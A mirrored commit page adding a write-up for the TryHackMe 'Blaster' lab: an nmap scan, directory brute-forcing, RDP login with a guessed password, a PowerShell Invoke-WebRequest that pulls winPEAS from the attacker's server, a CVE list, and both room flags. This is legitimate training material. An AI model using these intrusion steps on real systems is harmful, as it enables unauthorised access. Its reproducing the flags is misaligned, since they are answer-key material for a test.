mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-10 06:34:17 +00:00
Add files via upload
This commit is contained in:
parent
ef4ba1c5ed
commit
b3718cdadb
1 changed files with 211 additions and 0 deletions
211
TryHackMe/Blaster.md
Normal file
211
TryHackMe/Blaster.md
Normal file
|
@ -0,0 +1,211 @@
|
|||
# TryHackMe-Blaster CTF
|
||||
|
||||
>Abdullah Rizwan | 17th September , 06:19 PM
|
||||
|
||||
|
||||
## NMAP
|
||||
|
||||
```
|
||||
export IP=10.10.74.61
|
||||
|
||||
```
|
||||
|
||||
Now we want to scan all ports that are open on the box so for this we are going to use `-p-` ports `-A` aggressive scan to look for all ports `-T4` is the speed of the result and `$IP` is IP variable.
|
||||
|
||||
```
|
||||
nmap -p- -A -T4 $IP
|
||||
```
|
||||
|
||||
```
|
||||
Host is up (0.22s latency).
|
||||
Not shown: 65520 closed ports
|
||||
PORT STATE SERVICE VERSION
|
||||
80/tcp open http Microsoft IIS httpd 10.0
|
||||
| http-methods:
|
||||
|_ Potentially risky methods: TRACE
|
||||
|_http-server-header: Microsoft-IIS/10.0
|
||||
|_http-title: IIS Windows Server
|
||||
135/tcp open msrpc Microsoft Windows RPC
|
||||
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|
||||
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
|
||||
3306/tcp open mysql MySQL (unauthorized)
|
||||
3389/tcp open ms-wbt-server Microsoft Terminal Services
|
||||
| rdp-ntlm-info:
|
||||
| Target_Name: RETROWEB
|
||||
| NetBIOS_Domain_Name: RETROWEB
|
||||
| NetBIOS_Computer_Name: RETROWEB
|
||||
| DNS_Domain_Name: RetroWeb
|
||||
| DNS_Computer_Name: RetroWeb
|
||||
| Product_Version: 10.0.14393
|
||||
|_ System_Time: 2020-09-17T13:37:30+00:00
|
||||
| ssl-cert: Subject: commonName=RetroWeb
|
||||
| Not valid before: 2020-05-21T21:44:38
|
||||
|_Not valid after: 2020-11-20T21:44:38
|
||||
|_ssl-date: 2020-09-17T13:37:36+00:00; -1s from scanner time.
|
||||
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
||||
|_http-server-header: Microsoft-HTTPAPI/2.0
|
||||
|_http-title: Not Found
|
||||
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
||||
|_http-server-header: Microsoft-HTTPAPI/2.0
|
||||
|_http-title: Not Found
|
||||
49664/tcp open msrpc Microsoft Windows RPC
|
||||
49665/tcp open msrpc Microsoft Windows RPC
|
||||
49666/tcp open msrpc Microsoft Windows RPC
|
||||
49667/tcp open msrpc Microsoft Windows RPC
|
||||
49669/tcp open msrpc Microsoft Windows RPC
|
||||
49670/tcp open msrpc Microsoft Windows RPC
|
||||
49678/tcp open msrpc Microsoft Windows RPC
|
||||
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
|
||||
TCP/IP fingerprint:
|
||||
OS:SCAN(V=7.80%E=4%D=9/17%OT=80%CT=1%CU=33259%PV=Y%DS=2%DC=T%G=Y%TM=5F6366A
|
||||
OS:A)OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M5
|
||||
OS:08NW8ST11%O6=M508ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
|
||||
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
|
||||
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
|
||||
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
|
||||
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
|
||||
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
|
||||
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
|
||||
OS:N%T=80%CD=Z)
|
||||
|
||||
Network Distance: 2 hops
|
||||
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
|
||||
|
||||
Host script results:
|
||||
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|
||||
| smb-security-mode:
|
||||
| authentication_level: user
|
||||
| challenge_response: supported
|
||||
|_ message_signing: disabled (dangerous, but default)
|
||||
| smb2-security-mode:
|
||||
| 2.02:
|
||||
|_ Message signing enabled but not required
|
||||
| smb2-time:
|
||||
| date: 2020-09-17T13:37:29
|
||||
|_ start_date: 2020-09-17T13:23:20
|
||||
|
||||
TRACEROUTE (using port 143/tcp)
|
||||
HOP RTT ADDRESS
|
||||
1 175.30 ms 10.8.0.1
|
||||
2 228.68 ms 10.10.74.61
|
||||
|
||||
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
Nmap done: 1 IP address (1 host up) scanned in 786.80 seconds
|
||||
|
||||
```
|
||||
|
||||
Web server is on http://10.10.74.61:80/
|
||||
|
||||
## Gobuster
|
||||
|
||||
```
|
||||
gobuster dir -u 10.10.74.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||||
===============================================================
|
||||
Gobuster v3.0.1
|
||||
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
|
||||
===============================================================
|
||||
[+] Url: http://10.10.74.61
|
||||
[+] Threads: 10
|
||||
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||||
[+] Status codes: 200,204,301,302,307,401,403
|
||||
[+] User Agent: gobuster/3.0.1
|
||||
[+] Timeout: 10s
|
||||
===============================================================
|
||||
2020/09/17 09:45:48 Starting gobuster
|
||||
===============================================================
|
||||
/retro (Status: 301)
|
||||
Progress: 7068 / 220561 (3.20%)
|
||||
[!] Keyboard interrupt detected, terminating.
|
||||
===============================================================
|
||||
2020/09/17 09:50:04 Finished
|
||||
|
||||
```
|
||||
By visiting the directory `/retro` we will find a username `Wade`.
|
||||
|
||||
|
||||
By going through the page we will see a post
|
||||
|
||||
```
|
||||
Ready Player One
|
||||
|
||||
by Wade
|
||||
|
||||
I can’t believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it’s because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I’ll eventually get it down. Either way, I’m really excited to see this movie!
|
||||
|
||||
```
|
||||
Now by googling the name of the avatar we will find `Parzival` which is the passworrd for `Wade`.
|
||||
|
||||
|
||||
|
||||
## Remmina (RDP)
|
||||
|
||||
Remmina is RDP client for linux
|
||||
|
||||
Simply launch the application and in the username insert `wade` in password `parzival` and you will be logged into windows machine.
|
||||
|
||||
|
||||
```
|
||||
THM{HACK_PLAYER_ONE}
|
||||
```
|
||||
|
||||
|
||||
Now that we have access to the machine we can run `winPEAS` on it to do that we first need to host it on our local machine
|
||||
|
||||
```
|
||||
python -m SimpleHTTPServer
|
||||
Serving HTTP on 0.0.0.0 port 8000 ...
|
||||
|
||||
```
|
||||
|
||||
Then open powershell on target machine since `curl` isn't available.
|
||||
|
||||
```
|
||||
Invoke-WebRequest http://10.8.94.60:8000/winPEAS.exe -O winPEAS.exe
|
||||
```
|
||||
And run the file.
|
||||
|
||||
```
|
||||
[!] CVE-2019-0836 : VULNERABLE
|
||||
[>] https://exploit-db.com/exploits/46718
|
||||
[>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
|
||||
|
||||
[!] CVE-2019-0841 : VULNERABLE
|
||||
[>] https://github.com/rogue-kdc/CVE-2019-0841
|
||||
[>] https://rastamouse.me/tags/cve-2019-0841/
|
||||
|
||||
[!] CVE-2019-1064 : VULNERABLE
|
||||
[>] https://www.rythmstick.net/posts/cve-2019-1064/
|
||||
|
||||
[!] CVE-2019-1130 : VULNERABLE
|
||||
[>] https://github.com/S3cur3Th1sSh1t/SharpByeBear
|
||||
|
||||
[!] CVE-2019-1253 : VULNERABLE
|
||||
[>] https://github.com/padovah4ck/CVE-2019-1253
|
||||
|
||||
[!] CVE-2019-1315 : VULNERABLE
|
||||
[>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html
|
||||
|
||||
[!] CVE-2019-1385 : VULNERABLE
|
||||
[>] https://www.youtube.com/watch?v=K6gHnr-VkAg
|
||||
|
||||
[!] CVE-2019-1388 : VULNERABLE
|
||||
[>] https://github.com/jas502n/CVE-2019-1388
|
||||
|
||||
[!] CVE-2019-1405 : VULNERABLE
|
||||
[>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
|
||||
|
||||
```
|
||||
You will see theses CVE's which are vulnerable to this machine for me internet explorer wasn't showing history so this method also works.
|
||||
|
||||
|
||||
## Previlege Esacalation
|
||||
|
||||
This is the video which helps to escalate our privileges.
|
||||
|
||||
https://www.youtube.com/watch?v=3BQKpPNlTSo
|
||||
|
||||
|
||||
```
|
||||
THM{COIN_OPERATED_EXPLOITATION}
|
||||
```
|
||||
This is the root flag.
|
Loading…
Reference in a new issue